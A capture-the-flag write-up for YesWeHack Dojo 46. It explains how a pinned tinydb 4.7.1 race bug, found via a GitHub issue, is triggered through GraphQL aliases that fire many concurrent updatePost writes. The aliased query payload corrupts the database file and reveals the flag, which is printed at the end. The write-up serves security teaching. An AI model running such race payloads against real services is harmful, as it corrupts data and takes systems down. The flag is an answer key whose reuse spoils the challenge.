dojo

📜 Challenge Description

Description

A new API has been developed in Python. The developers have placed great emphasis on the API’s speed and load balancing, but at what cost?

⚠️ Note: To view the setup code for this challenge, click on settings (⚙ icon) located at the top over the tab: INFO.

Challenge link: https://dojo-yeswehack.com/challenge-of-the-month/dojo-46

🕵️ Proof of Concept

I. Source Code Analysis

Here is the Python source code provided by the challenge:

import os, json, tinydb, graphene, threading
from urllib.parse import unquote
from jinja2 import Environment, FileSystemLoader
template = Environment(
    autoescape=True,
    loader=FileSystemLoader('/tmp/templates'),
).get_template('index.html')
os.chdir('/tmp')
threads = []
db = tinydb.TinyDB('data.json')

# Define a proper Post type so Graphene knows the structure
class Post(graphene.ObjectType):
    id = graphene.Int()
    content = graphene.String()

class GraphqlQuery(graphene.ObjectType):
    
    get_posts = graphene.List(Post)
    update_post = graphene.Boolean(id=graphene.Int(), content=graphene.String())

    def update_post_in_db(id, content):
        node = db.search(tinydb.Query().id == int(id))
        if node == []:
            return False
        else:
            node[0]['content'] = content
            db.update(node[0], tinydb.Query().id == int(id))
            return True

    def resolve_update_post(self, info, id, content):
        t = threading.Thread(target=GraphqlQuery.update_post_in_db, args=[id, content])
        t.start()
        threads.append(t)

    def resolve_get_posts(self, info):
        return db.all()

def main():
    # User input (GraphQL query)
    query = unquote("userinput")

    schema = graphene.Schema(query=GraphqlQuery)
    schema.execute(query)

    # Wait for all GraphQL processes to finish
    for t in threads:
        t.join()
    
    result = schema.execute("{ getPosts { id content } }")

    # Check if the JSON in the posts are malformed
    posts = {}
    
    # TODO : Random crashes appear time to time with same input, but different error. We working on a fix.
    if result.errors:
        posts = json.dumps({"FLAG": os.environ["FLAG"]}, indent=2)
    else:
        posts = json.dumps(result.data, indent=2)

    print(template.render(posts=posts))

main()

General Analysis

This code loads a database in JSON format (a file) and implements a GraphQL API that manipulates the data contained in this file. The user input is located in the query variable, which is then directly executed as a GraphQL query without any filtering.

The GraphQL API allows manipulation of “posts,” which are defined by an id (an int) and content (a string). The API allows retrieving the content and updating it.

Code analysis and goal

The objective here is clear: we need the final getPosts query (the second schema.execute call) to return an error. This activates the branch below, which displays the flag read from an environment variable:

    if result.errors:
        posts = json.dumps({"FLAG": os.environ["FLAG"]}, indent=2)
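To make this branch concrete, here is a minimal sketch of the mechanism, using only the standard library. `ExecutionResult`, `execute`, and `render_posts` are hypothetical stand-ins written for this illustration, not graphene's API; the sketch only assumes that a GraphQL executor reports an exception raised in a resolver through `errors` instead of letting it propagate.

```python
import json
from dataclasses import dataclass, field
from typing import Any, Callable, List, Optional


@dataclass
class ExecutionResult:
    """Hypothetical stand-in for the object returned by schema.execute()."""
    data: Optional[Any] = None
    errors: List[Exception] = field(default_factory=list)


def execute(resolver: Callable[[], Any]) -> ExecutionResult:
    """Run a resolver and report any exception in `errors` instead of raising."""
    try:
        return ExecutionResult(data=resolver())
    except Exception as exc:
        return ExecutionResult(errors=[exc])


def render_posts(result: ExecutionResult, flag: str) -> str:
    """Same branching as the challenge's main(), with the flag passed in."""
    if result.errors:
        return json.dumps({"FLAG": flag}, indent=2)
    return json.dumps(result.data, indent=2)


def healthy_resolver() -> dict:
    # Illustrative data only
    return {"getPosts": [{"id": 1, "content": "hello"}]}


def failing_resolver() -> dict:
    # Simulates a database read that blows up
    raise ValueError("database file could not be parsed")


ok_output = render_posts(execute(healthy_resolver), flag="FLAG{placeholder}")
leaked_output = render_posts(execute(failing_resolver), flag="FLAG{placeholder}")
print(ok_output)
print(leaked_output)
```

Any failure while reading the posts is therefore enough: the code never checks what kind of error occurred.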

I. Library review

Another important element is the setup code of the challenge, which contains a detail that should always be checked during a code review:

tinydb = import_v("tinydb", "4.7.1")

Indeed, the code imports the “tinydb” library, but it imports a very specific version: version “4.7.1”. When performing a code review, it is always relevant to examine the dependencies/libraries used by the code as well as their versions. This can help identify known vulnerabilities or bugs that could potentially be exploited.
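In an ordinary Python environment (the challenge uses its own import_v helper instead), the same check can be sketched with the standard library. The `PINNED` mapping and the helper name below are assumptions made for this example; only `importlib.metadata.version` and `PackageNotFoundError` come from Python itself.

```python
from importlib import metadata
from typing import Optional

# Hypothetical list of versions worth flagging during a review
PINNED = {"tinydb": "4.7.1"}


def installed_version(package: str) -> Optional[str]:
    """Return the installed version of a package, or None if it is absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


# Map each package to (installed version, version under review)
report = {name: (installed_version(name), pin) for name, pin in PINNED.items()}

for name, (found, pin) in report.items():
    if found is None:
        print(f"{name}: not installed here")
    elif found == pin:
        print(f"{name}: {found} matches the version under review, check its issue tracker")
    else:
        print(f"{name}: {found} installed, review targets {pin}")
```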

In this type of situation, I first search for information about the library on the internet. These libraries are often open source and, in the best (and most common) cases, they have a GitHub repository. That is the case for tinydb (github.com/msiemens/tinydb).

One of the first things I do is check the “issues” section to see if there are any bugs in the version we are interested in.

And bingo, there is indeed a referenced bug. For more details, I invite you to directly check the GitHub issue: https://github.com/msiemens/tinydb/issues/529.

In this issue, the author wrote code that follows the same principles as ours, with the ability to retrieve data from a tinydb “db”. These data are referenced and accessible via ids. The parsing and data retrieval code using the id is strikingly similar to ours.

Moreover, the issue describes a crash that occurs when an “attacker tries to update a node way too fast”. That is exactly what we need: a crash that triggers an error and gives us the flag 🙂 We are now sure that we are on the right track!

The author explains that querying the same node multiple times within a few seconds is enough to crash the code, because a null byte ends up inserted in the database file.
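A stray byte after the JSON document is enough to make the file unreadable, as this small sketch suggests. The document layout below is illustrative only, and `parse_error` is a hypothetical helper name.

```python
import json
from typing import Optional

# Illustrative database content; the exact layout on disk is an assumption
valid = json.dumps({"_default": {"1": {"id": 1, "content": "b4n3"}}})

# Same content with a trailing null byte, as described in the issue
corrupted = valid + "\x00"


def parse_error(text: str) -> Optional[str]:
    """Return the parser's error message, or None if the text is valid JSON."""
    try:
        json.loads(text)
        return None
    except json.JSONDecodeError as exc:
        return exc.msg


print("valid file     ->", parse_error(valid))
print("corrupted file ->", parse_error(corrupted))
```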

Right after that, he provides a Python script that fuzzes the same node and shows that the application crashes within a few seconds. In our case, however, the challenge environment does not let us fuzz or send multiple simultaneous requests.

Continuing our reading, we notice an important piece of information (which I will summarize here, but which you can read in detail directly in the issue):

“Well, when two users each send an HTTP request to the Flask server, the server handles them asynchronously, meaning this opens up multithreading. One thread (or request) tries to perform a write to the db while the second thread has just started and is behind the first thread by 0.02 seconds, for example. Then this race condition somehow corrupts the last byte of the db.”

In summary, tinydb does not support multithreaded writes, whereas the Flask server used by the author handles concurrent HTTP requests in separate threads. The problem in our case is that the backend does not seem to use a Flask server.
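The following sketch illustrates how two unsynchronised writers can damage a JSON file. It is a deterministic simulation, not tinydb's code: it assumes a storage that seeks to the start of a shared file handle, writes the serialized data, then truncates, and it replays one unlucky interleaving by hand instead of using real threads. All function names are hypothetical.

```python
import io
import json


def seek_to_start(handle: io.StringIO) -> None:
    """First half of a write: move the shared cursor to the beginning."""
    handle.seek(0)


def write_and_truncate(handle: io.StringIO, data: dict) -> None:
    """Second half of a write: dump the data, then cut off anything after it."""
    handle.write(json.dumps(data))
    handle.truncate()


def is_valid_json(handle: io.StringIO) -> bool:
    try:
        json.loads(handle.getvalue())
        return True
    except json.JSONDecodeError:
        return False


post_a = {"1": {"id": 1, "content": "from thread A"}}
post_b = {"1": {"id": 1, "content": "from thread B"}}

# Writes that do not overlap: each one fully replaces the previous content
sequential = io.StringIO()
seek_to_start(sequential)
write_and_truncate(sequential, post_a)
seek_to_start(sequential)
write_and_truncate(sequential, post_b)
sequential_ok = is_valid_json(sequential)

# Overlapping writes: both "threads" seek before either one writes,
# so the second document lands right after the first one
interleaved = io.StringIO()
seek_to_start(interleaved)               # thread A
seek_to_start(interleaved)               # thread B
write_and_truncate(interleaved, post_a)  # thread A
write_and_truncate(interleaved, post_b)  # thread B
interleaved_ok = is_valid_json(interleaved)

print("sequential writes readable: ", sequential_ok)
print("interleaved writes readable:", interleaved_ok)
```

This interleaving produces two concatenated documents, not a null byte. Other interleavings would corrupt the file differently, which fits the TODO in the challenge code about different errors appearing for the same input.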

II. Exploiting GraphQL queries

However, we can notice a crucial feature in the code above:

    def resolve_update_post(self, info, id, content):
        t = threading.Thread(target=GraphqlQuery.update_post_in_db, args=[id, content])
        t.start()
        threads.append(t)

This feature is used when updating a post. It does not directly update the post but instead launches a thread that executes update_post_in_db, which then updates the database.

We can therefore deduce the following: if we manage to send several “post” updates at the same time, the application will start several threads simultaneously, which should trigger a crash since the code uses a library version that contains the bug :)
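This sketch reproduces the fire-and-forget pattern of resolve_update_post without GraphQL or tinydb. The `threading.Barrier` is an addition made for this example only: it forces every worker to wait until all five are running, which makes the overlap observable. In the real code there is no barrier, so the overlap is likely but not guaranteed.

```python
import threading

WORKERS = 5
threads = []
arrived = []
arrived_lock = threading.Lock()
barrier = threading.Barrier(WORKERS)


def update_post_in_db(post_id, content):
    """Stand-in for the database write; it only records that it ran."""
    # Blocks until all workers are alive at the same time (example-only aid)
    barrier.wait(timeout=5)
    with arrived_lock:
        arrived.append((post_id, content))


def resolve_update_post(post_id, content):
    """Same shape as the challenge resolver: start a thread and return at once."""
    t = threading.Thread(target=update_post_in_db, args=[post_id, content])
    t.start()
    threads.append(t)


# One call per updatePost field in the query
for _ in range(WORKERS):
    resolve_update_post(1, "b4n3")

# Same join loop as in main()
for t in threads:
    t.join()

all_overlapped = len(arrived) == WORKERS
print("threads started:", len(threads))
print("all workers were running concurrently:", all_overlapped)
```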

According to the graphene documentation and the GraphQL syntax, we can modify a post with the following query (by default, graphene exposes the update_post field in camelCase, as updatePost):

{
  updatePost(id: 1, content: "b4n3")
}

Result: the post is correctly updated.

Now, is it possible to send multiple updates at once in a single GraphQL query? After some research, the answer is yes. GraphQL aliases let us request the same field several times under different names:

{
  a: updatePost(id: 1, content: "b4n3")
  b: updatePost(id: 1, content: "b4n3")
  c: updatePost(id: 1, content: "b4n3")
  d: updatePost(id: 1, content: "b4n3")
  e: updatePost(id: 1, content: "b4n3")
}
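For a larger number of aliases, the query above can be generated and not typed by hand. This is a minimal sketch: `build_payload` and the `u0`, `u1`, ... alias names are hypothetical, `json.dumps` is used as an approximation of GraphQL string escaping that should be adequate for simple content, and the URL-encoding step is optional and shown only because main() calls unquote on the input.

```python
import json
from urllib.parse import quote, unquote


def build_payload(count: int, post_id: int = 1, content: str = "b4n3") -> str:
    """Build one GraphQL query containing `count` aliased updatePost fields."""
    # Double-quoted, escaped string literal
    literal = json.dumps(content)
    fields = [
        f"  u{i}: updatePost(id: {post_id}, content: {literal})"
        for i in range(count)
    ]
    return "{\n" + "\n".join(fields) + "\n}"


payload = build_payload(5)
encoded = quote(payload)

print(payload)
print(encoded)
```

Raising the count starts more threads per request, which should make a collision more likely, at the cost of a longer payload.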

It is sometimes necessary to send the payload several times before a crash occurs, but it eventually returns the flag.

The Flag:

FLAG{M4ke_It_Cr4sh_Th3y_Sa1d?!}

Conclusion

This challenge is very interesting because it demonstrates the importance and methodology of vulnerability research in dependencies and libraries associated with audited source code. It is always important to check the versions used, as well as all associated bugs and/or vulnerabilities.

YesWeHack - Dojo 47